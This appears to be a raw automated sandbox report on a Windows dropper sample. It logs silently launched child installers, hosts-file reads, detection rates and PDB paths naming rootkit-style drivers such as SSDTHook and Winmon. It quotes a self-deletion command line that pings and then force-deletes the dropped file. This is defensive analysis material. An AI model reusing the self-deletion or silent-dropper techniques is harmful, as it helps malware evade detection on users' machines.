            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeVirustotal: Detection: 31%
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeReversingLabs: Detection: 27%
            Source: tpwlxkeo40z.exeString found in binary or memory: hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_bl
            Source: installer.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe 'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe 'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe 'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparams
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe 'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe 'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe 'C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe' /silent /subid=482
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe 'C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe' /verysilent /cid=12 /subid=209
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe 'C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe' 57a764d042bf8
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe 'C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe' /S /pubid=1 /subid=451
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe 'C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe' testparams
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe 'C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe 'C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe' /8-23
            Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /k 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 & exit
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\hh.exe 'C:\windows\hh.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe 'C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe' /silent /subid=482
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\hh.exe 'C:\windows\hh.exe'
            Source: unknownProcess created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe 'C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe' /VERYSILENT /p=testparams
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe 'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe 'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe 'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe 'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparamsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe 'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe 'C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe' /silent /subid=482Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe 'C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe' /verysilent /cid=12 /subid=209Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe 'C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe' 57a764d042bf8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe 'C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe' /S /pubid=1 /subid=451Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe 'C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe' testparamsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe 'C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe 'C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe' /8-23Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe 'C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe' /silent /subid=482Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess created: C:\Windows\hh.exe 'C:\windows\hh.exe'
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /k 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 & exit
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess created: C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe 'C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe' /VERYSILENT /p=testparams
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLL
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe.config
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF\uninstaller.exe
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF\uninstaller.exe.config
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393}
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\Users\wizzlabs\source\repos\PopUnder\PopUnder\obj\Release\SiZebiLin.pdbw) source: tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\PopUnder\PopUnder\obj\Release\SiZebiLin.pdb source: tpwlxkeo40z.exe
            Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdb source: 2mqvpn30gyk.exe
            Source: Binary string: symsrv.pdb source: app.exe, 00000013.00000002.852052823.0000000000B9F000.00000040.00020000.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: multitimer.exe, 00000002.00000002.669955444.000000001B530000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.683380716.00000000127CB000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdbcE source: 2mqvpn30gyk.exe, 0000000E.00000002.764745587.000000000266E000.00000004.00000001.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: mscorrc.pdb source: multitimer.exe, 00000002.00000002.668297568.0000000000CC0000.00000002.00000001.sdmp, multitimer.exe, 00000003.00000002.681530464.0000000000990000.00000002.00000001.sdmp, multitimer.exe, 00000008.00000002.723019042.0000000003110000.00000002.00000001.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: multitimer.exe, 00000002.00000002.669955444.000000001B530000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.683380716.00000000127CB000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\admin\source\repos\EuBuild\obj\Debug\EuBuild.pdb source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
